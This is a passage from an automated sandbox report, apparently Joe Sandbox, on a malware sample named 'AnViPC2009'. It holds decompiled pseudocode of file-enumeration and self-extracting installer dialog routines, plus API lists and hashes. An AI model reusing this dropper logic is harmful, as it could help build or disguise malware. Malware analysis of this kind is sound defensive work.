                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0x1084)) =  *((intOrPtr*)(_t208 - 0xd0));
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0x1088)) =  *((intOrPtr*)(_t208 - 0xcc));
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0x108c)) =  *((intOrPtr*)(_t208 - 0xc8));
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0x1090)) =  *((intOrPtr*)(_t208 - 0xc4));
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0x1094)) =  *((intOrPtr*)(_t208 - 0xc0));
                                                                                                                                                  							E0040E04D(_t182, _t206 + 0xc14, _t208 - 0xc4);
                                                                                                                                                  							E0040E04D(_t182, _t206 + 0xc38, _t208 - 0xd4);
                                                                                                                                                  							E0040E04D(_t182, _t206 + 0xc5c, _t208 - 0xcc);
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0xc0c)) = E0040DFA5(_t206 + 0xc14);
                                                                                                                                                  							if(E0040DB6D(_t206) != 0) {
                                                                                                                                                  								 *_t182 = 0;
                                                                                                                                                  							}
                                                                                                                                                  							L32:
                                                                                                                                                  							 *(_t206 + 0x1098) =  *(_t206 + 0x1098) & 0x00000000;
                                                                                                                                                  							return  *(_t208 + 0x70);
                                                                                                                                                  						}
                                                                                                                                                  						if(GetLastError() == 2) {
                                                                                                                                                  							L25:
                                                                                                                                                  							_t136 = 0;
                                                                                                                                                  							L26:
                                                                                                                                                  							 *((char*)(_t206 + 0x109c)) = _t136;
                                                                                                                                                  							goto L32;
                                                                                                                                                  						}
                                                                                                                                                  						L23:
                                                                                                                                                  						if(_t221 == 0) {
                                                                                                                                                  							goto L25;
                                                                                                                                                  						}
                                                                                                                                                  						_t136 = 1;
                                                                                                                                                  						goto L26;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t140 =  *((intOrPtr*)(_t208 + 0x78));
                                                                                                                                                  				if(_t140 == 0 ||  *_t140 == 0) {
                                                                                                                                                  					E0040E218( *((intOrPtr*)(_t208 + 0x74)), _t208 - 0x9e8, 0x1000000);
                                                                                                                                                  				} else {
                                                                                                                                                  					E0040E40C(_t208 - 0x9e8, _t140);
                                                                                                                                                  				}
                                                                                                                                                  				_t206 =  *((intOrPtr*)(_t208 + 0x7c));
                                                                                                                                                  				_t183 = _t179 | 0xffffffff;
                                                                                                                                                  				_push(_t208 - 0x1e8);
                                                                                                                                                  				if( *(_t208 + 0x70) != _t183) {
                                                                                                                                                  					if(FindNextFileW( *(_t208 + 0x70), ??) == 0) {
                                                                                                                                                  						 *(_t208 + 0x70) = _t183;
                                                                                                                                                  						 *((char*)(_t206 + 0x109c)) = GetLastError() & 0xffffff00 | _t172 != 0x00000012;
                                                                                                                                                  					}
                                                                                                                                                  					if( *(_t208 + 0x70) == _t183) {
                                                                                                                                                  						goto L32;
                                                                                                                                                  					} else {
                                                                                                                                                  						goto L13;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_t175 = FindFirstFileW(_t208 - 0x9e8, ??); // executed
                                                                                                                                                  					 *(_t208 + 0x70) = _t175;
                                                                                                                                                  					if(_t175 != _t183) {
                                                                                                                                                  						L13:
                                                                                                                                                  						E0040E40C(_t206 + 0x400, _t208 - 0x9e8);
                                                                                                                                                  						E0040E40C(E0040740B(_t206 + 0x400), _t208 - 0x1bc);
                                                                                                                                                  						E0040E1E9(_t186, _t206 + 0x400, _t206, 0x1000000);
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0xc00)) = E00401030( *((intOrPtr*)(_t208 - 0x1cc)), 0, 0, 1) +  *((intOrPtr*)(_t208 - 0x1c8));
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0xc08)) =  *((intOrPtr*)(_t208 - 0x1e8));
                                                                                                                                                  						asm("adc edx, ebx");
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0xc04)) = _t197;
                                                                                                                                                  						E0040E1E9( *((intOrPtr*)(_t208 - 0x1c8)), _t208 + 0x4c, _t206 + 0xc80, 0x1000000);
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0x1080)) =  *((intOrPtr*)(_t208 - 0x1e4));
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0x1084)) =  *((intOrPtr*)(_t208 - 0x1e0));
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0x1088)) =  *((intOrPtr*)(_t208 - 0x1dc));
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0x108c)) =  *((intOrPtr*)(_t208 - 0x1d8));
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0x1090)) =  *((intOrPtr*)(_t208 - 0x1d4));
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0x1094)) =  *((intOrPtr*)(_t208 - 0x1d0));
                                                                                                                                                  						E0040E04D(0, _t206 + 0xc14, _t208 - 0x1d4);
                                                                                                                                                  						E0040E04D(0, _t206 + 0xc38, _t208 - 0x1e4);
                                                                                                                                                  						E0040E04D(0, _t206 + 0xc5c, _t208 - 0x1dc);
                                                                                                                                                  						_t169 = E0040DFA5(_t206 + 0xc14);
                                                                                                                                                  						_t204 = _t206 + 0x400;
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0xc0c)) = _t169;
                                                                                                                                                  						if(E0040DB8B(_t204) != 0) {
                                                                                                                                                  							 *_t204 = 0;
                                                                                                                                                  						}
                                                                                                                                                  						goto L32;
                                                                                                                                                  					}
                                                                                                                                                  					_t176 = GetLastError();
                                                                                                                                                  					if(_t176 == 2 || _t176 == 3) {
                                                                                                                                                  						goto L25;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t221 = _t176 - 0x12;
                                                                                                                                                  						goto L23;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}






















                                                                                                                                                  0x00405bd2
                                                                                                                                                  0x00405bd2
                                                                                                                                                  0x00405bd3
                                                                                                                                                  0x00405bdd
                                                                                                                                                  0x00405bec
                                                                                                                                                  0x00405dae
                                                                                                                                                  0x00405db3
                                                                                                                                                  0x00405dd4
                                                                                                                                                  0x00405dba
                                                                                                                                                  0x00405dc2
                                                                                                                                                  0x00405dc2
                                                                                                                                                  0x00405dd9
                                                                                                                                                  0x00405ddc
                                                                                                                                                  0x00405de5
                                                                                                                                                  0x00405de9
                                                                                                                                                  0x00405e2c
                                                                                                                                                  0x00405e2e
                                                                                                                                                  0x00405e3d
                                                                                                                                                  0x00405e3d
                                                                                                                                                  0x00405e46
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405deb
                                                                                                                                                  0x00405df2
                                                                                                                                                  0x00405df8
                                                                                                                                                  0x00405dfd
                                                                                                                                                  0x00405e4c
                                                                                                                                                  0x00405e54
                                                                                                                                                  0x00405e67
                                                                                                                                                  0x00405e6d
                                                                                                                                                  0x00405e75
                                                                                                                                                  0x00405e95
                                                                                                                                                  0x00405ea1
                                                                                                                                                  0x00405eb1
                                                                                                                                                  0x00405eb4
                                                                                                                                                  0x00405eba
                                                                                                                                                  0x00405ec5
                                                                                                                                                  0x00405ed1
                                                                                                                                                  0x00405edd
                                                                                                                                                  0x00405ee9
                                                                                                                                                  0x00405ef5
                                                                                                                                                  0x00405f01
                                                                                                                                                  0x00405f16
                                                                                                                                                  0x00405f28
                                                                                                                                                  0x00405f3a
                                                                                                                                                  0x00405f47
                                                                                                                                                  0x00405f54
                                                                                                                                                  0x00405f58
                                                                                                                                                  0x00405f58
                                                                                                                                                  0x00405f5b
                                                                                                                                                  0x00405f5b
                                                                                                                                                  0x00405f6c
                                                                                                                                                  0x00405f6c
                                                                                                                                                  0x00405e08
                                                                                                                                                  0x00405e14
                                                                                                                                                  0x00405e14
                                                                                                                                                  0x00405e16
                                                                                                                                                  0x00405e16
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e16
                                                                                                                                                  0x00405e0d
                                                                                                                                                  0x00405e0d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e11
                                                                                                                                                  0x00405de9
                                                                                                                                                  0x00405bf2
                                                                                                                                                  0x00405bf7
                                                                                                                                                  0x00405c19
                                                                                                                                                  0x00405bff
                                                                                                                                                  0x00405c07
                                                                                                                                                  0x00405c07
                                                                                                                                                  0x00405c1e
                                                                                                                                                  0x00405c21
                                                                                                                                                  0x00405c2a
                                                                                                                                                  0x00405c2e
                                                                                                                                                  0x00405c6f
                                                                                                                                                  0x00405c71
                                                                                                                                                  0x00405c80
                                                                                                                                                  0x00405c80
                                                                                                                                                  0x00405c89
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405c30
                                                                                                                                                  0x00405c37
                                                                                                                                                  0x00405c3d
                                                                                                                                                  0x00405c42
                                                                                                                                                  0x00405c8f
                                                                                                                                                  0x00405c9d
                                                                                                                                                  0x00405cb0
                                                                                                                                                  0x00405cb8
                                                                                                                                                  0x00405cd8
                                                                                                                                                  0x00405ce4
                                                                                                                                                  0x00405cf5
                                                                                                                                                  0x00405cf8
                                                                                                                                                  0x00405cfe
                                                                                                                                                  0x00405d09
                                                                                                                                                  0x00405d15
                                                                                                                                                  0x00405d21
                                                                                                                                                  0x00405d2d
                                                                                                                                                  0x00405d39
                                                                                                                                                  0x00405d45
                                                                                                                                                  0x00405d5a
                                                                                                                                                  0x00405d6c
                                                                                                                                                  0x00405d7e
                                                                                                                                                  0x00405d85
                                                                                                                                                  0x00405d8a
                                                                                                                                                  0x00405d91
                                                                                                                                                  0x00405d9e
                                                                                                                                                  0x00405da6
                                                                                                                                                  0x00405da6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405d9e
                                                                                                                                                  0x00405c44
                                                                                                                                                  0x00405c4d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405c5c
                                                                                                                                                  0x00405c5c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405c5c
                                                                                                                                                  0x00405c4d

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406E67: GetVersionExA.KERNEL32(?), ref: 00406E8B
                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,00000000,?,01000000,?,?,00000000), ref: 00405C37
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405C44
                                                                                                                                                  • FindNextFileW.KERNEL32(?,?,00000000,?,01000000,?,?,00000000), ref: 00405C67
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405C74
                                                                                                                                                    • Part of subcall function 0040E1E9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,0040515F,?,?,01000000,?), ref: 0040E203
                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?,00000002,?,01000000,?,?,00000000), ref: 00405DF2
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405DFF
                                                                                                                                                  • FindNextFileA.KERNEL32(?,?,00000002,?,01000000,?,?,00000000), ref: 00405E24
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405E31
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileFindLast$FirstNext$ByteCharMultiVersionWide
                                                                                                                                                  • String ID: @Mhv
                                                                                                                                                  • API String ID: 3067395930-3595611156
                                                                                                                                                  • Opcode ID: f3f69437bd299231ee4952ecf933f72a1098c9994ee953a9bf584cb8bdaa0410
                                                                                                                                                  • Instruction ID: 1cf902d0640d0bfb9c10475f3d8c45b57b5720f228852893026f829341d92c2b
                                                                                                                                                  • Opcode Fuzzy Hash: f3f69437bd299231ee4952ecf933f72a1098c9994ee953a9bf584cb8bdaa0410
                                                                                                                                                  • Instruction Fuzzy Hash: 49A13C719006589BDB20EF75CC81BDB77F8AF04304F10496BE55AE3291DB78AA85CF68
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 40cc05-40cc38 call 401200 call 403059 5 40d08b-40d09e 0->5 6 40cc3e-40cc3f 0->6 9 40d0a0-40d0a9 SendMessageA 5->9 10 40d0af-40d0b6 5->10 7 40cc50-40cc52 6->7 8 40cc41-40cc46 6->8 13 40d378-40d37c 7->13 11 40ccb1-40cccc GetDlgItemTextA 8->11 12 40cc48-40cc49 8->12 9->10 14 40d0c8-40d13c call 40ba0f GetDlgItem GetWindowRect MapWindowPoints SetMenu CreateWindowExA 10->14 15 40d0b8-40d0c2 SendDlgItemMessageA 10->15 19 40cceb-40ccf1 11->19 20 40ccce-40ccd4 11->20 16 40cc88-40cc8e 12->16 17 40cc4b-40cc4e 12->17 29 40d147-40d176 SetWindowPos DestroyWindow SendMessageA 14->29 30 40d13e-40d145 SetMenu 14->30 15->14 26 40cc90-40cca0 16->26 27 40cca2-40ccac 16->27 17->7 23 40cc57-40cc6e call 4098d0 call 402794 17->23 24 40cd02-40cd14 GetDlgItem 19->24 25 40ccf3-40ccfd 19->25 21 40cce0 20->21 22 40ccd6 20->22 31 40cce2-40cce9 KiUserCallbackDispatcher 21->31 22->21 36 40cc80-40cc83 23->36 56 40cc70-40cc7a SetDlgItemTextA 23->56 34 40cd16-40cd35 SendMessageA * 2 24->34 35 40cd37-40cd59 SetFocus call 4058c1 24->35 33 40d01d-40d023 25->33 26->27 26->36 37 40cf7b-40cf7c 27->37 39 40d183-40d18f SendMessageA 29->39 40 40d178-40d17d SendMessageA 29->40 38 40d195-40d1be GetCurrentDirectoryA GetDlgItem 30->38 31->36 33->21 43 40d029-40d02f 33->43 34->35 52 40cd6b-40cd81 SetCurrentDirectoryA 35->52 53 40cd5b-40cd60 GetLastError 35->53 36->13 37->31 44 40d1c0 38->44 45 40d1c6-40d1fd SetWindowTextA call 40aad5 call 40ca76 38->45 39->38 40->39 43->21 48 40d035-40d056 call 4098d0 SetDlgItemTextA 43->48 44->45 72 40d20d-40d213 45->72 73 40d1ff-40d208 call 40bf72 45->73 62 40d058-40d05b 48->62 63 40d05d-40d06c 48->63 59 40cd83-40cd88 GetLastError 52->59 60 40cd8e-40cd95 call 406e67 52->60 57 40cd62-40cd65 53->57 58 40cd67 53->58 56->36 57->52 57->58 58->52 59->60 65 40cd8a 59->65 69 40cd97-40cd9d 60->69 70 40cdfd-40ce00 60->70 67 40d06e-40d086 call 4098d0 * 2 MessageBoxA 62->67 63->67 65->60 67->36 69->70 74 40cd9f-40cda2 69->74 79 40cf81-40cfef call 40b908 call 40303b * 3 call 40bf72 * 2 call 40b2fb call 40bf72 70->79 80 40ce06-40ce0c 70->80 77 40d270-40d276 72->77 78 40d215-40d21b 72->78 73->72 81 40ce11-40ce1b 74->81 83 40cda4-40cddb GetTickCount wsprintfA call 404e8a call 40519f 74->83 86 40d303-40d305 77->86 87 40d27c-40d284 call 40bf72 77->87 88 40d220-40d24b call 40a5bb call 4098d0 call 40a5bb 78->88 170 40cff1-40cff7 79->170 171 40d00f-40d017 call 40303b 79->171 80->81 82 40ce0e 80->82 90 40ce21-40ceb4 GetModuleFileNameA wsprintfA CreateFileMappingA 81->90 91 40cf2a-40cf75 call 4098d0 wsprintfA call 40321d call 4098d0 MessageBoxA 81->91 82->81 126 40cde0-40cde5 83->126 95 40d306-40d30d 86->95 104 40d289-40d290 87->104 157 40d24d-40d253 88->157 98 40cee2-40ceee ShellExecuteExA 90->98 99 40ceb6-40cecd MapViewOfFile GetCommandLineA 90->99 91->37 102 40d319-40d31f 95->102 103 40d30f-40d313 EnableWindow 95->103 109 40cef0-40cf11 WaitForInputIdle Sleep 98->109 110 40cf13 98->110 107 40ced9-40cedc UnmapViewOfFile 99->107 108 40cecf-40ced4 call 40dbc0 99->108 113 40d321-40d32e call 40303b * 2 102->113 114 40d333-40d33a 102->114 103->102 115 40d292-40d298 104->115 116 40d2ba-40d2c3 104->116 107->98 108->107 125 40cf17-40cf1a 109->125 110->125 113->114 119 40d33c-40d342 114->119 120 40d35e-40d364 114->120 115->116 129 40d29a-40d2b5 call 406d16 call 40a1de 115->129 122 40d2f4-40d301 call 40bf72 116->122 123 40d2c5-40d2df DialogBoxParamA 116->123 119->120 131 40d344-40d34e 119->131 134 40d376 120->134 135 40d366-40d370 call 4098d0 SetDlgItemTextA 120->135 122->95 123->122 133 40d2e1-40d2ef EndDialog 123->133 139 40cf25-40cf28 125->139 140 40cf1c-40cf1f CloseHandle 125->140 137 40cdf2-40cdf8 call 40503b 126->137 138 40cde7-40cdec GetLastError 126->138 129->116 145 40d350-40d356 SendMessageA 131->145 146 40d358 PostMessageA 131->146 133->134 134->13 135->134 137->70 138->137 149 40cdee 138->149 139->37 139->91 140->139 145->120 146->120 149->137 157->77 160 40d255-40d26b call 406d16 157->160 160->77 170->171 172 40cff9-40cfff 170->172 171->33 172->171 174 40d001-40d00a call 40bf72 172->174 174->171
                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                  			E0040CC05(void* __ecx, void* __edx, struct HWND__* _a4, struct HWND__* _a8, void* _a11, struct HWND__* _a12, void* _a15, void* _a16) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				struct tagPOINT _v20;
                                                                                                                                                  				struct _SHELLEXECUTEINFOA _v80;
                                                                                                                                                  				char _v1104;
                                                                                                                                                  				char _v2128;
                                                                                                                                                  				char _v2640;
                                                                                                                                                  				char _v5340;
                                                                                                                                                  				char _v5744;
                                                                                                                                                  				char _v13936;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* _t98;
                                                                                                                                                  				long _t99;
                                                                                                                                                  				long _t100;
                                                                                                                                                  				void* _t114;
                                                                                                                                                  				int _t117;
                                                                                                                                                  				CHAR* _t122;
                                                                                                                                                  				void* _t126;
                                                                                                                                                  				void* _t136;
                                                                                                                                                  				void* _t138;
                                                                                                                                                  				void* _t157;
                                                                                                                                                  				struct HWND__* _t160;
                                                                                                                                                  				void* _t163;
                                                                                                                                                  				void* _t165;
                                                                                                                                                  				void* _t166;
                                                                                                                                                  				intOrPtr _t182;
                                                                                                                                                  				CHAR* _t183;
                                                                                                                                                  				void* _t202;
                                                                                                                                                  				int _t204;
                                                                                                                                                  				CHAR* _t209;
                                                                                                                                                  				void* _t217;
                                                                                                                                                  				long _t219;
                                                                                                                                                  				long _t220;
                                                                                                                                                  				long _t221;
                                                                                                                                                  				void* _t224;
                                                                                                                                                  				void* _t228;
                                                                                                                                                  				void* _t232;
                                                                                                                                                  				intOrPtr _t233;
                                                                                                                                                  				intOrPtr _t234;
                                                                                                                                                  				void* _t239;
                                                                                                                                                  				struct HWND__* _t245;
                                                                                                                                                  				int _t247;
                                                                                                                                                  				void* _t249;
                                                                                                                                                  				void* _t255;
                                                                                                                                                  				struct HWND__* _t258;
                                                                                                                                                  				void* _t259;
                                                                                                                                                  
                                                                                                                                                  				_t244 = __edx;
                                                                                                                                                  				_t232 = __ecx;
                                                                                                                                                  				E00401200(0x366c);
                                                                                                                                                  				_t258 = _a4;
                                                                                                                                                  				E00403059(__edx, _t258, _a8, _a12, _a16, "STARTDLG", 0, 0); // executed
                                                                                                                                                  				_t98 = _a8 - 0x110;
                                                                                                                                                  				if(_t98 == 0) {
                                                                                                                                                  					_t99 =  *0x4192d4; // 0x203fd
                                                                                                                                                  					 *0x419f80 = _t258;
                                                                                                                                                  					 *0x419f7c = _t258;
                                                                                                                                                  					__eflags = _t99;
                                                                                                                                                  					if(_t99 != 0) {
                                                                                                                                                  						SendMessageA(_t258, 0x80, 1, _t99);
                                                                                                                                                  					}
                                                                                                                                                  					_t100 =  *0x4192d0; // 0xb6050a85
                                                                                                                                                  					__eflags = _t100;
                                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                                  						SendDlgItemMessageA(_t258, 0x69, 0x172, 0, _t100); // executed
                                                                                                                                                  					}
                                                                                                                                                  					E0040BA0F(_t244, __eflags, _t258);
                                                                                                                                                  					_a8 = GetDlgItem(_t258, 0x67);
                                                                                                                                                  					GetWindowRect(_a8,  &_v20);
                                                                                                                                                  					MapWindowPoints(0, _t258,  &_v20, 2);
                                                                                                                                                  					_t245 = SetMenu;
                                                                                                                                                  					SetMenu(_a8, 0);
                                                                                                                                                  					_t114 = CreateWindowExA(0, "RichEdit", 0x4125aa, 0x50a10844, _v20.x, _v20.y, _v12 - _v20 + 1, _v8 - _v20.y + 1, _t258, 0x67,  *0x414c78, 0); // executed
                                                                                                                                                  					_a12 = _t114;
                                                                                                                                                  					__eflags = _t114;
                                                                                                                                                  					if(_t114 != 0) {
                                                                                                                                                  						_t245 = _a12;
                                                                                                                                                  						SetWindowPos(_t245, _a8, 0, 0, 0, 0, 0x203);
                                                                                                                                                  						DestroyWindow(_a8); // executed
                                                                                                                                                  						_a8 = _t245;
                                                                                                                                                  						_t117 = SendMessageA(_t258, 0x31, 0, 0);
                                                                                                                                                  						__eflags = _t117;
                                                                                                                                                  						if(_t117 != 0) {
                                                                                                                                                  							SendMessageA(_t245, 0x30, _t117, 0); // executed
                                                                                                                                                  						}
                                                                                                                                                  						SendMessageA(_t245, 0x435, 0, 0x400000);
                                                                                                                                                  					} else {
                                                                                                                                                  						SetMenu(_a8, 0x67);
                                                                                                                                                  					}
                                                                                                                                                  					GetCurrentDirectoryA(0x400,  &_v2128);
                                                                                                                                                  					_a12 = GetDlgItem(_t258, 0x65);
                                                                                                                                                  					_t122 = 0x419f92;
                                                                                                                                                  					__eflags =  *0x419f92; // 0x0
                                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                                  						_t122 =  &_v2128;
                                                                                                                                                  					}
                                                                                                                                                  					SetWindowTextA(_a12, _t122); // executed
                                                                                                                                                  					E0040AAD5(_t232, __eflags, _a12); // executed
                                                                                                                                                  					 *0x41a814 = 0; // executed
                                                                                                                                                  					E0040CA76(0, _t244, _t245, _t258, __eflags, "C:\Users\alfons\Desktop\Endermanch@AnViPC2009.exe", "C:\Users\alfons\Desktop\Endermanch@AnViPC2009.exe", 0x41a818, 0x41a824); // executed
                                                                                                                                                  					__eflags =  *0x41a824;
                                                                                                                                                  					if( *0x41a824 > 0) {
                                                                                                                                                  						E0040BF72(_t244, _t258, _t258,  *0x41a818, 7); // executed
                                                                                                                                                  					}
                                                                                                                                                  					__eflags =  *0x41a814;
                                                                                                                                                  					if( *0x41a814 != 0) {
                                                                                                                                                  						L80:
                                                                                                                                                  						__eflags =  *0x41a824;
                                                                                                                                                  						if( *0x41a824 <= 0) {
                                                                                                                                                  							_t247 = 1;
                                                                                                                                                  							__eflags = 1;
                                                                                                                                                  							L89:
                                                                                                                                                  							__eflags =  *0x419f8c - 2;
                                                                                                                                                  							if( *0x419f8c == 2) {
                                                                                                                                                  								EnableWindow(_a12, 0);
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *0x419f88; // 0x0
                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                  								E0040303B(_t258, 0x66, 0);
                                                                                                                                                  								E0040303B(_t258, 0x65, 0);
                                                                                                                                                  							}
                                                                                                                                                  							_t126 =  *0x419f8c; // 0x1
                                                                                                                                                  							__eflags = _t126;
                                                                                                                                                  							if(_t126 != 0) {
                                                                                                                                                  								__eflags =  *0x419f78; // 0x2
                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_push(_t247);
                                                                                                                                                  									_push(0x111);
                                                                                                                                                  									_push(_t258);
                                                                                                                                                  									__eflags = _t126 - _t247;
                                                                                                                                                  									if(_t126 != _t247) {
                                                                                                                                                  										PostMessageA();
                                                                                                                                                  									} else {
                                                                                                                                                  										SendMessageA(); // executed
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *0x419f68; // 0x0
                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                  								SetDlgItemTextA(_t258, _t247, E004098D0(0x7d));
                                                                                                                                                  							}
                                                                                                                                                  							L100:
                                                                                                                                                  							return _t247;
                                                                                                                                                  						}
                                                                                                                                                  						E0040BF72(_t244, _t258, _t258,  *0x41a818, 0); // executed
                                                                                                                                                  						_t136 =  *0x41a81c;
                                                                                                                                                  						__eflags = _t136;
                                                                                                                                                  						if(_t136 != 0) {
                                                                                                                                                  							__eflags =  *0x419f8c; // 0x1
                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                  								_t233 =  *0x418ecc; // 0x0
                                                                                                                                                  								E00406D16(_t233,  *0x414c74, _a8, _t136);
                                                                                                                                                  								E0040A1DE( *0x41a81c);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t247 = 1;
                                                                                                                                                  						__eflags =  *0x419f8c - _t247; // 0x1
                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                  							L87:
                                                                                                                                                  							E0040BF72(_t244, _t258, _t258,  *0x41a818, _t247);
                                                                                                                                                  							goto L89;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t138 = DialogBoxParamA( *0x414c74, "LICENSEDLG", 0, E0040CB0C, 0);
                                                                                                                                                  							__eflags = _t138;
                                                                                                                                                  							if(_t138 != 0) {
                                                                                                                                                  								goto L87;
                                                                                                                                                  							}
                                                                                                                                                  							 *0x419f78 = 1;
                                                                                                                                                  							EndDialog(_t258, 1);
                                                                                                                                                  							goto L100;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						_v13936 = 0;
                                                                                                                                                  						_t249 = 0x96;
                                                                                                                                                  						do {
                                                                                                                                                  							E0040A5BB( &_v13936, " ");
                                                                                                                                                  							E0040A5BB( &_v13936, E004098D0(_t249));
                                                                                                                                                  							_t249 = _t249 + 1;
                                                                                                                                                  							__eflags = _t249 - 0x9b;
                                                                                                                                                  						} while (_t249 <= 0x9b);
                                                                                                                                                  						__eflags =  *0x419f8c; // 0x1
                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                  							_t234 =  *0x418ecc; // 0x0
                                                                                                                                                  							E00406D16(_t234,  *0x414c74, _a8,  &_v13936);
                                                                                                                                                  						}
                                                                                                                                                  						goto L80;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				if(_t98 != 1) {
                                                                                                                                                  					L5:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t157 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                  				if(_t157 == 0) {
                                                                                                                                                  					GetDlgItemTextA(_t258, 0x65,  &_v1104, 0x400);
                                                                                                                                                  					__eflags =  *0x419f70; // 0x0
                                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                                  						__eflags =  *0x419f68; // 0x0
                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                  							_t160 = GetDlgItem(_t258, 0x67);
                                                                                                                                                  							_a8 = _t160;
                                                                                                                                                  							__eflags =  *0x419f74; // 0x0
                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                  								SendMessageA(_t160, 0xb1, 0, 0xffffffff);
                                                                                                                                                  								SendMessageA(_a8, 0xc2, 0, 0x4125aa);
                                                                                                                                                  							}
                                                                                                                                                  							SetFocus(_a8);
                                                                                                                                                  							_a11 = 0;
                                                                                                                                                  							_t163 = E004058C1(0, _t258,  &_v1104, 0, 0);
                                                                                                                                                  							__eflags = _t163;
                                                                                                                                                  							if(_t163 != 0) {
                                                                                                                                                  								L25:
                                                                                                                                                  								_t165 = SetCurrentDirectoryA( &_v1104); // executed
                                                                                                                                                  								__eflags = _t165;
                                                                                                                                                  								_a15 = _t165 != 0;
                                                                                                                                                  								__eflags = _a15;
                                                                                                                                                  								if(_a15 == 0) {
                                                                                                                                                  									_t220 = GetLastError();
                                                                                                                                                  									__eflags = _t220 - 5;
                                                                                                                                                  									if(_t220 == 5) {
                                                                                                                                                  										_a11 = 1;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								_t166 = E00406E67();
                                                                                                                                                  								__eflags = _t166;
                                                                                                                                                  								if(_t166 == 0) {
                                                                                                                                                  									L35:
                                                                                                                                                  									__eflags = _a15;
                                                                                                                                                  									if(_a15 != 0) {
                                                                                                                                                  										E0040B908(_t258,  &_v1104);
                                                                                                                                                  										 *0x419f6c = 1;
                                                                                                                                                  										E0040303B(_t258, 0x66, 0);
                                                                                                                                                  										E0040303B(_t258, 0x65, 0);
                                                                                                                                                  										E0040303B(_t258, 1, 0);
                                                                                                                                                  										E0040BF72(_t244, _t258, _t258,  *0x41a818, 5);
